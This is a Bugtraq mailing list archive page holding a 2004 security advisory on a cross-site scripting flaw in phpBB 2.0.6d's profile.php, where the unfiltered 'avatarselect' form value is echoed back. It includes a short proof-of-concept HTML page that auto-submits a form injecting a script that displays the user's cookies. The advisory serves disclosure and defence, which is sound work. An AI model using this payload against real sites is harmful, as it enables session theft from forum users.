Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

bugtraq logo Bugtraq mailing list archives

phpBB profile.php Cross Site Scripting Vulnerability
From: Cheng Peng Su <apple_soup () msn com>
Date: 21 Mar 2004 03:36:19 -0000



#####################################################################

 Advisory Name : phpBB profile.php Cross Site Scripting Vulnerability
  Release Date : Mar 21,2004 
   Application : phpBB
       Version : phpBB 2.0.6d or others?
      Platform : PHP
    Vendor URL : http://www.phpbb.com/
        Author : Cheng Peng Su(apple_soup_at_msn.com)
     
#####################################################################

 Proof of Conecpt:
  
     This vuln is in profile.php,when you click [Show Gallery],phpBB 
  will show you Avatar gallery,asking you to choose one for yourself.
  The hole is in the form,after submitting phpBB will use the value of 
  "avatarselect" as the path of the gallery directly,without filtering
  any illegal characters.
   
 Exploit:
  
  -------------exploit.htm--------------
  <form name='f' action="http://site/profile.php?mode=editprofile"; method="post">
  <input name="avatarselect" value='" >&lt;script&gt;alert(document.cookie)&lt;/script&gt;'>
  <input type="submit" name="submitavatar" value="Select avatar">
  </form>
  &lt;script&gt;
  window.onload=function()
   {
    document.all.submitavatar.click();
   }
  &lt;/script&gt;
  ---------------end-------------------
  
 Contact:
 
  Cheng Peng Su
  Class 1,Senior 2,High school attached to Wuhan University
  Wuhan,Hubei,China(430072)
  apple_soup_at_msn.com

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]